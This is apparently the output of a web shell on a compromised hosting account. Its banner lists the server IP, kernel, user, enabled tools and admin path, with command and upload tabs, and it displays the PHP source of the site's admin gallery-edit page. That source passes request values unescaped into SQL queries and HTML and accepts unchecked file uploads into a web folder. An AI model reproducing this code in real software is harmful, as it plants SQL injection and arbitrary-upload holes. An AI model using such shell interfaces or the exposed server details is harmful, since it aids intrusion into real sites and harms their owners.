Server IP : 103.53.40.154 / Your IP : 3.148.108.192 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/thedigitalgulf.com/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php require_once("header.php");?> <?php require_once("left-nav.php");?> <link href="assets/plugins/icheck/skins/all.css" rel="stylesheet" type="text/css"/> <link href="assets/plugins/bootstrap-toggle/bootstrap-toggle.min.css" rel="stylesheet" type="text/css"/> <?php $imageID=$_REQUEST['edit_id']; $image_title=$_REQUEST['image_title']; $image_cat_name=$_REQUEST['image_category_name']; $image_status=$_REQUEST['image_status']; /*if($_REQUEST['delImage']!=""){ $isDel=db_query("UPDATE tbl_header SET header_logo='' WHERE 1 and header_id = '$header_id'"); @unlink("../gallery_image/$_REQUEST[delImage]"); header("location:addedit-logo.php?edit_header_id=$header_id"); } */ if(is_post_back()) { if(!empty($imageID)){ if($_FILES['file']['name']!="") { $DelImg=db_scalar("select image_name from tbl_image_gallery where 1 and image_id='$imageID'"); @unlink("../gallery_image/$DelImg"); $sqldel="delete from tbl_image_gallery where 1 and image_id='$imageID'"; db_query($sqldel); $rand=rand(100,10000); $file_name6=$rand.$_FILES['file']['name']; move_uploaded_file($_FILES['file']['tmp_name'],"../gallery_image/$file_name6"); $sql_edit6="image_name='$file_name6'"; $sql = "insert into tbl_image_gallery set $sql_edit6, image_title='$image_title', image_status='$image_status', image_add_date=now()"; $_SESSION["msg"]="Selected image is updated successfully."; }else { $sql = "update tbl_image_gallery set image_title='$image_title', image_status='$image_status', image_add_date=now() where image_id='$imageID' "; $_SESSION["msg"]="Selected image is updated successfully."; } }else{ $rand=rand(100,10000); $file_name=$rand.$_FILES['file']['name']; move_uploaded_file($_FILES['file']['tmp_name'],"../gallery_images/$file_name"); $sql = "insert into tbl_image_gallery set image_name='$file_name', image_title='$image_title', image_status='$image_status', image_add_date=now()"; $_SESSION["msg"]="Gallery image added successfully."; /* set_session_msg("Header Logo Added Successfully !"); header("Location: manage-header.php"); exit;*/ } db_query($sql); header("Location: manage-gallery.php"); } if($imageID!='') { $result = db_query("select * from tbl_image_gallery where image_id = '$imageID'"); if ($line_raw = mysqli_fetch_array($result)) { @extract($line_raw); } } ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <div class="header-icon"> <i class="fa fa-picture-o"></i> </div> <div class="header-title"> <h1>Edit Image</h1> <small>Edit Image Content</small> <a href="manage-gallery.php"><button id="btn-go-back" type="button" class="btn btn-labeled btn-inverse m-b-5 pull-right"> <span class="btn-label" ><i class="fa fa-chevron-circle-left"></i></span>Go Back </button></a> </div> </section> <!-- Main content --> <script src="../ckeditor/ckeditor.js"></script> <section class="content"> <div class="row"> <!-- Form controls --> <div class="col-sm-12"> <div class="panel panel-bd lobidrag" data-edit-title='false' data-close='false' data-reload='false'> <div class="panel-heading"> <div class="btn-group" id="buttonexport"> <a href="#"> <h4>General Information</h4> </a> </div> </div> <div class="panel-body"> <form name="form1" method="post" onsubmit="return formValidation()" enctype="multipart/form-data" class="col-sm-12" > <div class="form-group col-lg-4"> <label>Gallery Image</label> <?php if($image_name!=""){ ?> <img src="../gallery_images/<?=$image_name?>" class="form-control" style="width:252px;height:380px" /> <?php }else{?> <img src="assets/dist/img/no-image.jpg" class="form-control" style="width:252px;height:380px" /> <?php }?> </div> <div class="form-group col-lg-8" style="padding-top:30px"> <div class="form-group col-lg-12"> <label>Gallery Image</label> <input class="form-control" type="file" name="file" id="file" /> <p class="img-size">Widh : 600px, Height : 630px</p> </div> <div class="form-group col-lg-12"> <label>Image Title</label> <input type="text" class="form-control" placeholder="Enter Title" name="image_title" id="image_title" value="<?=$image_title?>" > </div> <!-- <div class="form-group col-lg-12"> <label>Category</label> <select class="form-control" name="image_category_name"> <option value="">Select Category</option> <?php $sql_cat=db_query("select * from tbl_category where 1 and category_status='Active' and category_parent_id='0' "); while($res_cat=mysqli_fetch_array($sql_cat)) {?> <option value="<?=$res_cat['category_url']?>" <?php if($image_category_name==$res_cat['category_url']){?>selected <?}?> ><?=$res_cat['category_name']?></option> <?}?> </select> </div> --> <div class="form-group col-lg-3"> <label>Status</label> <select name="image_status" class="form-control" > <option value="Active" <?php if($image_status=='Active'){ ?> selected="selected" <? } ?>>Active</option> <option value="Inactive" <?php if($image_status=='Inactive'){ ?> selected="selected" <? } ?>>Inactive</option> </select> </div> <div class="form-group col-lg-3 pt25"> <button type="submit" class="btn btn-add">Update</button> </div> </div> </form> </div> </div> </div> </div> </section> <!-- /.content --> </div> <?php require_once("footer.php"); ?>